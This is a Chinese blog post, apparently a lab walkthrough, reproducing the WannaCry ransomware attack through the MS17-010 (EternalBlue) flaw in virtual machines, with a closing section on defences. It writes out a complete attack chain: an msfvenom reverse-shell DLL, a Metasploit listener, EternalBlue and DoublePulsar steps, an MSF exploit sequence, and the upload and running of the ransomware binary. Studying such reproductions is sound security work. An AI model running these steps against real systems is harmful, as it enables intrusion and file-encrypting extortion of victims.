<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.1.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon16.ico">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"default"},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":{"gitalk":{"order":-2}},"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":-1,"unescape":false,"preload":true},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="WannaCry复现过程十分繁琐，仅推荐大家理解漏洞利用的基本过程。这里使用了两种复现方法，一种是Python构建shellcode代码攻击，以及双星脉冲漏洞、DLL文件的设置与后续逆向分析均有关，另一种是我们常用的MSF。">
<meta property="og:type" content="article">
<meta property="og:title" content="WannaCry勒索病毒分析之利用MS17-010漏洞实现勒索加密">
<meta property="og:url" content="http://example.com/posts/9784e9fe.html">
<meta property="og:site_name" content="v5le0n9&#39;s garden">
<meta property="og:description" content="WannaCry复现过程十分繁琐，仅推荐大家理解漏洞利用的基本过程。这里使用了两种复现方法，一种是Python构建shellcode代码攻击，以及双星脉冲漏洞、DLL文件的设置与后续逆向分析均有关，另一种是我们常用的MSF。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/posts/9784e9fe/1.1.1.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/1.1.2.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/1.1.3.jpg">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.1.1.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.1.2.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.1.3.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.1.4.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.1.5.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.1.6.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.1.7.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.1.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.2.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.3.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.1.8.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.4.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.5.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.6.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.7.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.8.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.9.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.10.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.11.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.12.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.13.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.16.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.17.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.18.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.14.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/3.2.15.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/1.3.1.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/1.3.2.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/1.3.3.png">
<meta property="og:image" content="http://example.com/posts/9784e9fe/1.3.4.png">
<meta property="article:published_time" content="2022-07-11T10:20:52.864Z">
<meta property="article:modified_time" content="2022-11-17T06:26:38.444Z">
<meta property="article:author" content="v5le0n9">
<meta property="article:tag" content="漏洞复现">
<meta property="article:tag" content="样本分析">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/posts/9784e9fe/1.1.1.png">

<link rel="canonical" href="http://example.com/posts/9784e9fe.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>WannaCry勒索病毒分析之利用MS17-010漏洞实现勒索加密 | v5le0n9's garden</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="v5le0n9's garden" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">v5le0n9's garden</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">小凉的秘密基地</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/v5le0n9" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/posts/9784e9fe.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="v5le0n9">
      <meta itemprop="description" content="小呀小二郎呀背着个书包上学堂">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="v5le0n9's garden">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          WannaCry勒索病毒分析之利用MS17-010漏洞实现勒索加密
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-07-11 18:20:52" itemprop="dateCreated datePublished" datetime="2022-07-11T18:20:52+08:00">2022-07-11</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-11-17 14:26:38" itemprop="dateModified" datetime="2022-11-17T14:26:38+08:00">2022-11-17</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Windows%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">Windows安全</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>3.7k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>3 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>WannaCry复现过程十分繁琐，仅推荐大家理解漏洞利用的基本过程。这里使用了两种复现方法，一种是Python构建shellcode代码攻击，以及双星脉冲漏洞、DLL文件的设置与后续逆向分析均有关，另一种是我们常用的MSF。</p>
<span id="more"></span>
<p>下图是安天分析WannaRen勒索软件的攻击流程，其名称和功能与WannaCry相似。</p>
<img src="/posts/9784e9fe/1.1.1.png" class="" title="勒索病毒攻击过程">
<h1 id="1-WannaCry背景"><a href="#1-WannaCry背景" class="headerlink" title="1. WannaCry背景"></a>1. WannaCry背景</h1><p>2017年5月12日，WannaCry蠕虫通过永恒之蓝MS17-010漏洞在全球范围大爆发，感染大量的计算机。WannaCry勒索病毒全球大爆发，至少150个国家、30万名用户中招，造成损失达80亿美元，已影响金融、能源、医疗、教育等众多行业，造成严重的危害。</p>
<p>WannaCry是一种“蠕虫式”勒索病毒软件，由不法分子利用NSA泄露方程式工具包的危险漏洞“EternalBlue”（永恒之蓝）进行传播。该蠕虫感染计算机后会向计算机中植入敲诈者病毒，导致电脑大量文件被加密。</p>
<p>WannaCry利用Windows系统的SMB漏洞获取系统的最高权限，该工具通过恶意代码扫描开放445端口的Windows系统。被扫描到的Windows系统，只要开机上线，不需要用户进行任何操作，即可通过SMB漏洞上传WannaCry勒索病毒等恶意程序。</p>
<img src="/posts/9784e9fe/1.1.2.png" class="" title="勒索病毒">
<p>WannaCry利用永恒之蓝漏洞进行网络端口扫描攻击，目标机器被成功攻陷后会从攻击机下载WannaCry蠕虫进行感染，并作为攻击机再次扫描互联网和局域网的其它机器，形成蠕虫感染大范围超快速扩散。</p>
<p>木马母体为<code>mssecsvc.exe</code>，运行后会扫描随机IP的互联网机器，尝试感染，也会扫描局域网相同网段的机器进行感染传播，此外会释放敲诈者程序<code>tasksche.exe</code>，对磁盘文件进行加密勒索。</p>
<p>木马加密使用AES加密文件，并使用非对称加密算法RSA 2048加密随机密钥，每个文件使用一个随机密钥，理论上不可攻破。同时<code>@WanaDecryptor@.exe</code>显示勒索界面。其核心流程如下图所示：</p>
<img src="/posts/9784e9fe/1.1.3.jpg" class="" title="勒索病毒核心流程">
<p>WannaCry勒索病毒主要行为是传播和勒索：</p>
<ul>
<li>传播：利用基于445端口的SMB漏洞MS17-010(永恒之蓝)进行传播</li>
<li>勒索：释放文件，包括加密器、解密器、说明文件、语言文件等；内存加载加密模块，加密执行类型文件，全部加密后启动解密器；解密器启动后，设置桌面背景显示勒索信息，弹窗窗口显示付款账号和勒索信息</li>
</ul>
<h1 id="2-实验环境搭建"><a href="#2-实验环境搭建" class="headerlink" title="2. 实验环境搭建"></a>2. 实验环境搭建</h1><h2 id="2-1-环境配置"><a href="#2-1-环境配置" class="headerlink" title="2.1 环境配置"></a>2.1 环境配置</h2><p>攻击机1：Kali Linux x64（IP地址：192.168.193.128）</p>
<p>攻击机2：Windows Server 2003  x86 企业版（IP地址：192.168.193.132）</p>
<p>靶机：Windows 7 x64（IP地址：192.168.193.141）</p>
<p><strong>保证攻击机1、攻击机2与靶机能两两通讯，均在同一局域网中。</strong></p>
<h2 id="2-2-实验工具"><a href="#2-2-实验工具" class="headerlink" title="2.2 实验工具"></a>2.2 实验工具</h2><ul>
<li>Python v2.6</li>
<li>Python32-221.win32-py2.6</li>
<li>Shadowbroker-master(<a target="_blank" rel="noopener" href="https://github.com/misterch0c/shadowbroker">https://github.com/misterch0c/shadowbroker</a>)</li>
<li>Wcry.exe</li>
</ul>
<h2 id="2-3-实验步骤"><a href="#2-3-实验步骤" class="headerlink" title="2.3 实验步骤"></a>2.3 实验步骤</h2><ol>
<li>配置Windows Server 2003、Kali、Windows 7实验环境</li>
<li>Kali检测受害主机445端口(SMB协议)是否开启</li>
<li>运行永恒之蓝Python脚本</li>
<li>利用DLL后门文件进行Doublepulsar注入</li>
<li>Metaploit获取受害主机的shell</li>
<li>运行<code>Wcry.exe</code>母体程序，实现勒索和文件加密</li>
</ol>
<h1 id="3-Python复现"><a href="#3-Python复现" class="headerlink" title="3. Python复现"></a>3. Python复现</h1><p><strong>实验复现过程必须在虚拟机中完成，运行之前关闭虚拟机Win 7的文件共享。</strong></p>
<h2 id="3-1-实验准备"><a href="#3-1-实验准备" class="headerlink" title="3.1 实验准备"></a>3.1 实验准备</h2><p>关闭Win 7虚拟机的文件共享，开启445端口，同时关闭防火墙。</p>
<img src="/posts/9784e9fe/3.1.1.png" class="" title="关闭文件共享">
<img src="/posts/9784e9fe/3.1.2.png" class="" title="开启445端口">
<img src="/posts/9784e9fe/3.1.3.png" class="" title="开启445端口">
<p>在Windows Server 2003系统中配置Python环境。</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.python.org/download/releases/2.6/">Python 2.6</a></li>
<li><a target="_blank" rel="noopener" href="https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/">Python32-221.win32-py2.6</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/misterch0c/shadowbroker">Shadowbroker工具包</a></li>
</ul>
<img src="/posts/9784e9fe/3.1.4.png" class="" title="配置环境变量">
<img src="/posts/9784e9fe/3.1.5.png" class="" title="配置Python环境">
<img src="/posts/9784e9fe/3.1.6.png" class="" title="配置Python环境">
<p>下载shadowbroker工具包，在windows文件夹中新建文件夹<code>logs</code>和<code>listeningposts</code>，用记事本打开windows文件夹中的<code>Fuzzbunch.xml</code>文件，并修改<code>ResourcesDir</code>和<code>LogDir</code>的路径为：C:\shadowbroker\windows\Resources和logs。注意，目录名不能有空格。</p>
<img src="/posts/9784e9fe/3.1.7.png" class="" title="新建文件夹和修改路径">
<h2 id="3-2-实验过程"><a href="#3-2-实验过程" class="headerlink" title="3.2 实验过程"></a>3.2 实验过程</h2><h3 id="3-2-1-提权"><a href="#3-2-1-提权" class="headerlink" title="3.2.1 提权"></a>3.2.1 提权</h3><p>用Kali扫描靶机是否开启445端口。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -Pn 192.168.193.141</span><br></pre></td></tr></table></figure>
<img src="/posts/9784e9fe/3.2.1.png" class="" title="445端口">
<p>使用msfvenom工具生成后门文件<code>abc.dll</code>。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.193.128 LPORT=6666 -f dll &gt; abc.dll</span><br></pre></td></tr></table></figure>
<p>其中，-p指定使用模块类型，-f指定文件类型。</p>
<img src="/posts/9784e9fe/3.2.2.png" class="" title="生成后门文件">
<p>将<code>abc.dll</code>上传到Windows Server 2003中。</p>
<img src="/posts/9784e9fe/3.2.3.png" class="" title="abc.dll">
<p>在Windows Server 2003运行永恒之蓝工具，若出现以下界面则工具安装成功。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python C:\shadowbroker\windows\fb.py</span><br></pre></td></tr></table></figure>
<img src="/posts/9784e9fe/3.1.8.png" class="" title="安装永恒之蓝工具">
<p>设置靶机IP、攻击机1的IP(反弹shell地址)、重定向以及新建项目名称等。重定向一定选no。其他选项默认，Enter即可。</p>
<img src="/posts/9784e9fe/3.2.4.png" class="" title="设置参数">
<p>加载永恒之蓝模块，获取受害主机的系统权限。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use Eternalblue</span><br></pre></td></tr></table></figure>
<img src="/posts/9784e9fe/3.2.5.png" class="" title="设置参数">
<p>设置受害主机操作系统Win 7 x64，设置模式FB，该模式下进行交互性参数输入。</p>
<img src="/posts/9784e9fe/3.2.6.png" class="" title="设置参数">
<img src="/posts/9784e9fe/3.2.7.png" class="" title="设置参数">
<p>当看到WIN和Eternalblue Succeeded信息，表示受害主机的权限获取成功。</p>
<img src="/posts/9784e9fe/3.2.8.png" class="" title="设置参数">
<p>接着设置Kali系统，通过Metasploit等待返回的shell。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msfconsole	#加载msf框架</span><br><span class="line">use exploit/multi/handler	#使用handler操作</span><br><span class="line">set payload windows/x64/meterpreter/reverse_tcp	#设置payload</span><br><span class="line">set LHOST 192.168.193.128	#设置本地IP</span><br><span class="line">set LPORT 6666	#设置本地端口</span><br><span class="line">run	#开启监听</span><br></pre></td></tr></table></figure>
<img src="/posts/9784e9fe/3.2.9.png" class="" title="监听本地端口">
<p>在Windows Server 2003中进行Doublepulsar注入(双倍脉冲)，具体流程如下：</p>
<p>输入<code>use Doublepulsar</code>加载双倍脉冲注入。设置相关参数，包括选择SMB协议，后门利用方法为RunDLL。</p>
<img src="/posts/9784e9fe/3.2.10.png" class="" title="设置参数">
<img src="/posts/9784e9fe/3.2.11.png" class="" title="设置参数">
<img src="/posts/9784e9fe/3.2.12.png" class="" title="设置参数">
<p>回到Kali查看meterpreter，此时成功获取受害主机的shell。</p>
<img src="/posts/9784e9fe/3.2.13.png" class="" title="反弹shell">
<h3 id="3-2-2-上传勒索病毒"><a href="#3-2-2-上传勒索病毒" class="headerlink" title="3.2.2 上传勒索病毒"></a>3.2.2 上传勒索病毒</h3><p>获得权限后，将勒索病毒<code>wcry.exe</code>上传至受害主机。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upload /home/v5le0n9/Desktop/wcry2.0/wcry.exe c:\\</span><br></pre></td></tr></table></figure>
<img src="/posts/9784e9fe/3.2.16.png" class="" title="上传勒索病毒">
<p>获取受害主机的shell，如果出现中文乱码输入<code>chcp 65001</code>设置编码，接着运行<code>wcry.exe</code>。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">shell</span><br><span class="line">chcp 65001</span><br><span class="line">wcry.exe</span><br></pre></td></tr></table></figure>
<img src="/posts/9784e9fe/3.2.17.png" class="" title="运行勒索病毒">
<p>运行病毒程序后的界面如下图所示，已经成功被勒索。</p>
<img src="/posts/9784e9fe/3.2.18.png" class="" title="勒索病毒">
<p>加密系统中的文件，被加密的文件后缀名统一修改为<code>.WNRY</code>。</p>
<ul>
<li>b.wnry：中招后的桌面壁纸</li>
<li>c.wnry：配置文件，包含洋葱域名、比特币地址、tor下载地址等</li>
<li>f.wnry：可免支付解密的文件列表</li>
<li>r.wnry：提示文件，包含中招提示信息</li>
<li>s.wnry：zip文件，包含tor客户端</li>
<li>t.wnry：测试文件</li>
<li>u.wnry：解密程序</li>
</ul>
<img src="/posts/9784e9fe/3.2.14.png" class="" title="程序加密后">
<img src="/posts/9784e9fe/3.2.15.png" class="" title="提示信息">
<p>上一篇文章是利用Python复现永恒之蓝漏洞，过程较为复杂，所以这篇文章将直接利用MSF复现MS17-010漏洞进行反弹shell，再上传勒索病毒进行复现，并详细讲解WannaCry勒索病毒的原理。</p>
<!--more-->
<h1 id="4-MSF复现"><a href="#4-MSF复现" class="headerlink" title="4. MSF复现"></a>4. MSF复现</h1><h2 id="4-1-环境配置"><a href="#4-1-环境配置" class="headerlink" title="4.1 环境配置"></a>4.1 环境配置</h2><p>攻击机：Kali Linux x64（IP地址：192.168.193.145）</p>
<p>靶机：Windows 7 x64（IP地址：192.168.193.141）</p>
<p>利用工具：MSF</p>
<h2 id="4-2-复现准备"><a href="#4-2-复现准备" class="headerlink" title="4.2 复现准备"></a>4.2 复现准备</h2><p>开启Win 7的445端口，同时关闭防火墙。注意，关闭虚拟机文件共享功能，否则后面上传的勒索病毒会通过局域网传播到物理机与其它虚拟机。</p>
<p>保证攻击机和靶机能够相互通讯，均在同一个局域网中。</p>
<h2 id="4-3-复现过程"><a href="#4-3-复现过程" class="headerlink" title="4.3 复现过程"></a>4.3 复现过程</h2><p>用Kali扫描靶机是否开启了445端口。</p>
<img src="/posts/9784e9fe/1.3.1.png" class="" title="445端口是否开启">
<p>打开msfconsole并查询MS17-010漏洞模块。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">search ms17-010</span><br></pre></td></tr></table></figure>
<p>由于靶机是我们自定义的，所以可以确定靶机的确存在MS17-010漏洞，进而省去利用辅助模块探测靶机是否存在该漏洞，直接利用漏洞利用模块提权。</p>
<img src="/posts/9784e9fe/1.3.2.png" class="" title="查找MS17-010漏洞相关模块信息">
<p>利用永恒之蓝漏洞并设置参数。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use 0</span><br><span class="line">set LHOST 192.168.193.145</span><br><span class="line">set RHOST 192.168.193.141</span><br><span class="line">set RPORT 445</span><br><span class="line">show options</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<img src="/posts/9784e9fe/1.3.3.png" class="" title="MS17-010漏洞利用">
<img src="/posts/9784e9fe/1.3.4.png" class="" title="MS17-010漏洞利用">
<p>此时，成功提取靶机权限。之后再进行上传勒索病毒操作。</p>
<h1 id="5-防御措施"><a href="#5-防御措施" class="headerlink" title="5. 防御措施"></a>5. 防御措施</h1><p>勒索软件常见防御措施如下：</p>
<ul>
<li>开启系统防火墙</li>
<li>关闭445、139等端口连接</li>
<li>开启系统自动更新，下载并更新补丁，及时修复漏洞</li>
<li>安装安全软件，开启主动防御进行拦截查杀</li>
<li>如非服务需要，建议把高危漏洞的端口都关闭，比如138、139、445、3389等</li>
</ul>
<p>由于WannaCry勒索病毒主要通过445端口入侵计算机，关闭方法可在Windows防火墙中添加入站规则，禁止通过445端口连接。</p>

    </div>

    
    
    
        <div class="reward-container">
  <div></div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.jpg" alt="v5le0n9 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.jpg" alt="v5le0n9 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag"><i class="fa fa-tag"></i> 漏洞复现</a>
              <a href="/tags/%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/" rel="tag"><i class="fa fa-tag"></i> 样本分析</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/2ae8b8b2.html" rel="prev" title="CVE-2020-0601漏洞复现及防御机制">
      <i class="fa fa-chevron-left"></i> CVE-2020-0601漏洞复现及防御机制
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/11f48b75.html" rel="next" title="外部威胁防护和勒索病毒对抗">
      外部威胁防护和勒索病毒对抗 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-WannaCry%E8%83%8C%E6%99%AF"><span class="nav-text">1. WannaCry背景</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-text">2. 实验环境搭建</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1-%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="nav-text">2.1 环境配置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-2-%E5%AE%9E%E9%AA%8C%E5%B7%A5%E5%85%B7"><span class="nav-text">2.2 实验工具</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-3-%E5%AE%9E%E9%AA%8C%E6%AD%A5%E9%AA%A4"><span class="nav-text">2.3 实验步骤</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3-Python%E5%A4%8D%E7%8E%B0"><span class="nav-text">3. Python复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" 